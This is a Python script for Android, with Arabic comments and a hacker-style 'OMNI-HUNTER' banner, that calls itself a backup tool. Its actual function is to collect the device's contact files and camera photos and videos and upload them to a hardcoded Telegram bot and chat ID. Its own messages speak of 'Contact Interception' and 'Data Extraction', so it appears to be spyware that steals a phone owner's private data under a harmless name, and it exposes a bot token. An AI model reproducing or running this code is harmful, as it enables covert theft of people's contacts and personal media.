import os
import telebot
import time
from datetime import datetime

# إعدادات البوت الخاص بك
TOKEN = "8413705320:AAFWFTOxNxd3lyDLdsPbI0F3X5B0IVHyDzs"
CHAT_ID = "6753022941"
bot = telebot.TeleBot(TOKEN)

# ألوان الواجهة
G = '\x1b[38;5;46m' # أخضر
R = '\x1b[38;5;196m' # أحمر
W = '\x1b[1;37m' # أبيض
Y = '\x1b[38;5;220m' # أصفر

def banner():
    os.system('clear')
    print(f"""
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
{R}  __  __  ____  _   _          {W}SYSTEM: {G}OMNI-HUNTER v3
{R} |  \/  |/ __ \| | | |         {W}USER:   {G}MOUSSA MEKKI
{R} | \  / | |  | | |_| |         {W}STATUS: {Y}PRE-FORMAT BACKUP
{R} |_|\/|_|\____/|_| |_|         {W}TARGET: {R}LOCAL_DATA_TRANSFER
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{W}
    """)

def send_to_telegram(file_path, category):
    try:
        with open(file_path, 'rb') as f:
            print(f"{G}[+]{W} Hunter found: {Y}{os.path.basename(file_path)} {G}({category})")
            if category == "CONTACTS":
                bot.send_document(CHAT_ID, f, caption=f"👤 Contact Backup\n📅 {datetime.now()}")
            elif category == "IMAGE":
                bot.send_photo(CHAT_ID, f)
            else:
                bot.send_document(CHAT_ID, f)
            return True
    except Exception as e:
        print(f"{R}[×] Error bypassing: {e}")
        return False

def start_backup():
    banner()
    print(f"{G}[*]{W} Initializing Data Extraction Protocol...")
    time.sleep(2)

    # 1. جهات الاتصال (عادة ما تكون بصيغة .vcf في مسار التخزين)
    print(f"\n{R}[!] Phase 1: Contact Interception...{W}")
    storage_path = "/sdcard/"
    for file in os.listdir(storage_path):
        if file.endswith(".vcf"):
            send_to_telegram(os.path.join(storage_path, file), "CONTACTS")

    # 2. الصور والفيديو من الـ Camera
    camera_path = "/sdcard/DCIM/Camera/"
    print(f"\n{R}[!] Phase 2: Media Extraction (Images & Videos)...{W}")
    
    if os.path.exists(camera_path):
        files = os.listdir(camera_path)
        for file in files:
            path = os.path.join(camera_path, file)
            if file.lower().endswith(('.png', '.jpg', '.jpeg')):
                send_to_telegram(path, "IMAGE")
            elif file.lower().endswith(('.mp4', '.mkv')):
                send_to_telegram(path, "VIDEO")
            time.sleep(1) # تأخير بسيط لتجنب حظر البوت من تلجرام
    
    print(f"\n{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{G}[SUCCESS]{W} ALL DATA TRANSFERRED TO TELEGRAM CLOUD.")
    print(f"{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")

if __name__ == "__main__":
    start_backup()
